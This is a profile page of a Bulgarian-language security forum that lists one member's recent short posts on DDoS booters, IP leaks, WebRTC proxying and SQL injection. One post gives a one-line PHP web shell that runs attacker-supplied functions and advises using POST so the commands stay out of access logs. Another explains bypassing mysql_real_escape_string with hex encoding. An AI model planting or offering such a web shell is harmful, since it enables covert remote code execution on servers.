Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad

Hexagone

Members
  • Content Count

    136
  • Joined

  • Last visited

  • Days Won

    4

Hexagone last won the day on March 12

Hexagone had the most liked content!

Community Reputation

71 Excellent

8 Followers

About Hexagone

  • Rank
    Good

Recent Profile Visitors

5,447 profile views
  1. Накрая на темата цитирам "няма нищо по-лесно от това да научим всичко за MAC-адреса, процесора, мрежовите интерфейси, достъпните устройства и директории". Ще поясниш ли какво имаш предвит? Или по-точно как би намерил MAC-адреса, процесора, мрежовите интерфейсй и достъпните устройства. Директориите са ясни, че може да се bruteforce-нат.
  2. Голям минус от мен. Познавам се лично със "1MP4C7" и приятеля му "Serpeto". И двамата са много несериозни във всяко отношение. Занимават се с "доксване" и DDoS, като рекламират, че е вид хакерство. Също така най-силната атака, която OVH са поемали до сега е 1 tbps и едвам издържаха на това.
  3. Начина по който пишеш е наистина труден за разбиране. За експлойта щом дава timeout най-вероятно IPто e грешно или порта не е отворен.
  4. Много по-добре е да не се използва статична функция като "passthru", защото може да се филтрира. Много по-добре е например <?php @$_POST['a'](@$_POST['b']); ?> Използваме POST, за да не се записва в access логовете.
  5. От доста време го има. Звучи като браузър, който ще изглежда сигурен, само защото хората ги мързи да го тестват.
  6. Hexagone

    Linux

    Бахти темите бате. От къде започна, до къде стигна.
  7. Не каза какъв е проблема?
  8. Това беше толкова трудно за четене.
  9. Хората си мислят, че като сложат mysql_real_escape_string() и вече всичко е 6. Функцията филтрира ' \ " и още някакви в хекс. Какво става ако не използваме апострофи обаче? SELECT id,username,password FROM `users` where id=11[HERE] В тоя случай функцията няма да направи абсолютно нищо. Просто когато се инжектва вместо ' се използва hex encoding (има и други начини де). Ползвайте prepared statements и то като хората, за да нямате проблеми.
  10. Изглежда, че линка по-горе вече не работи. https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014 Това би трябвало да обясни всичко. @Inkasatora
  11. Е има общо. И аз така преди виках, ама има много видове Denial of Service. Не е само да спреш интернета на някой. А и за Discord трябва да дадеш и числата до името си (IDто)
  12. Най-вероятно се е скарал с някое лапе, което има booter. Преди се разкарвах и ги хаквах буутърите повечето и тва не е някакво хвалене, просто защото бяха написани ужасно. Бих ти препоръчал да звъннеш на доставчика, да говориш с тях и да получиш ново IP, като вече не влизаш в Скайп без VPN/Proxy. Мини към Discord, много по-удобно и няма такива глупости.
  13. E не обичам така недовършени работи. Real-time communication (RTC) is a new integrated communication medium based on the upcoming W3C standard WebRTC, making use of other components like HTML5/JavaScript, the iLBC audio codec, and the VP8 video codec. ^ какво е RTC А webRTC е просто позволява на browser-ите да го достъпват чрез API-та. Фатката е, че по-принцип повечето addon-и и тем подобни не проксифицират тези request-и.
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.